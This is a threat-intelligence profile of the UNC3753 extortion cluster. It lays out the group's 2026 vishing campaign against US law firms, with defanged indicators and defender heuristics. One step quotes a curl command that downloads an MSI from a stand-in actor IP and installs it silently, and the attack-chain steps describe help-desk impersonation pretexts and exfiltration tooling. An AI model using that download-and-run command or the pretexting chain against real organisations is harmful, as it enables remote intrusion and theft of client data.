UNC3753

Summary

UNC3753 is a financially motivated data-theft extortion cluster tracked by Mandiant / Google Threat Intelligence Group. Google says the cluster is also tracked as Luna Moth, Chatty Spider, and Silent Ransom Group.

From January through May 2026, Mandiant observed UNC3753 targeting dozens of U.S. professional-services, legal, and financial-services organizations. The operators use benign email pretexts, follow-on voice phishing, screen sharing, remote-management tools, and victim-assisted data staging to steal sensitive files quickly enough that an intrusion can move from first contact to extortion in a single business day.

Tags

• groups
• actor
• UNC3753
• Luna Moth
• Chatty Spider
• Silent Ransom Group
• vishing
• social engineering
• RMM
• data theft
• extortion
• legal sector
• professional services
• financial services
• United States

Why this matters

• UNC3753 bypasses many perimeter controls by convincing users to run legitimate screen-sharing, remote-desktop, and remote-monitoring tools.
• Mandiant reports recent cases where data search, staging, and theft began in under an hour, leaving little response time after the first vishing success.
• The 2026 campaign targets law-firm and professional-services data such as proprietary agreements, tax records, personally identifiable information, financial records, and client material.
• Mandiant says some possibly linked cases included people posing as IT technicians entering corporate offices to try direct endpoint exfiltration with USB storage, making physical access controls part of the same intrusion surface.

Reported 2026 law-firm campaign chain

1. Operators send low-signal invoice-themed email from actor-controlled consumer email accounts. The messages contain no links or attachments and are meant to establish a pretext for later calls.
2. Callers impersonate internal IT help desk or security staff, often targeting employees whose contact details are publicly listed.
3. Under data-migration, invoice, or security-issue pretexts, the caller directs the employee into screen-sharing or remote-control sessions.
4. Screen-sharing and remote access may use Zoom, Microsoft Terminal Services, Microsoft Teams, Quick Assist, AnyDesk, Bomgar, Zoho Assist, or a claimed SuperOps RMM installer.
5. The actor may pass installer links and commands through privnote[.]com; Mandiant observed a cURL-to-MSI pattern resembling curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet.
6. In BYOD cases, the actor used the victim's personal endpoint to reach corporate VDI such as Windows 365 or Citrix.
7. Operators enumerate local directories, active OneDrive folders, mapped network drives, and legal document repositories.
8. In law-firm environments, Mandiant saw searches in iManage for tax logs, Forms W-2 / W-9 / 1099, audit files, corporate client agreements, Social Security numbers, and other sensitive folders.
9. Staged data is placed in user-accessible paths such as Downloads or Roaming profile directories.
10. Exfiltration uses browser uploads to actor-controlled consumer file-sharing accounts, portable WinSCP, Rclone, Google Drive, FTP/SFTP flows, or victim-sent email forwarding from the target mailbox.
11. Extortion emails arrive quickly after theft, sometimes within 30 minutes of the actor leaving the environment, with short deadlines and threats to notify employees, clients, or publish data.

Infrastructure and leak-site notes

• Mandiant reports UNC3753 uses hxxps[:]//business-data-leaks[.]com to disclose victims and stolen data.
• Google Threat Intelligence Group identified suspected social-engineering infrastructure using organization-themed domains such as:
• <organization>-itdesk[.]com
• <organization>-it[.]com
• <organization>-helpdesk[.]com
• Public Google reporting lists example IP indicators including 192.236.147.131, 192.236.147.138, 193.141.60.212, 192.236.154.158, 192.236.146.173, 174.169.162.62, and 64.94.84.97.

Defender heuristics

• Treat unexpected invoice/security/data-migration emails followed by help-desk phone calls as a single attack path even when the email has no link or attachment.
• Require employees to verify help-desk calls through an independently known channel before joining screen-sharing sessions or installing RMM tools.
• Alert on new AnyDesk, Bomgar, Zoho Assist, SuperOps, WinSCP, Rclone, Quick Assist, Teams remote-control, or unusual Terminal Services activity from user workstations and BYOD-to-VDI paths.
• Monitor for MSI installers launched from user profile paths or downloaded by command-line tools such as curl during remote-support sessions.
• In legal environments, watch iManage and document-management searches for tax-form, audit, client-agreement, SSN, and mass-export patterns followed by Downloads/Roaming staging.
• Correlate remote session telemetry, VDI access, OneDrive activity, browser uploads, WinSCP/Rclone execution, mailbox forwarding/sending, and file-sharing account destinations.
• Extend security awareness and incident runbooks to physical impersonation: front desks and office staff should verify unscheduled IT technicians, and endpoints should restrict USB mass-storage use where business permits.
• When UNC3753-style extortion arrives, prioritize scoping data access, disabling remote tools, invalidating sessions, reviewing VDI/BYOD paths, preserving document-system logs, and identifying client-data exposure before broad but unfocused resets.

Related pages

• BlackFile / UNC6671 vishing extortion operation
• Kali365 device-code phishing expansion
• 0ktapus phishing campaign

Sources

• Google Cloud / Mandiant — Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms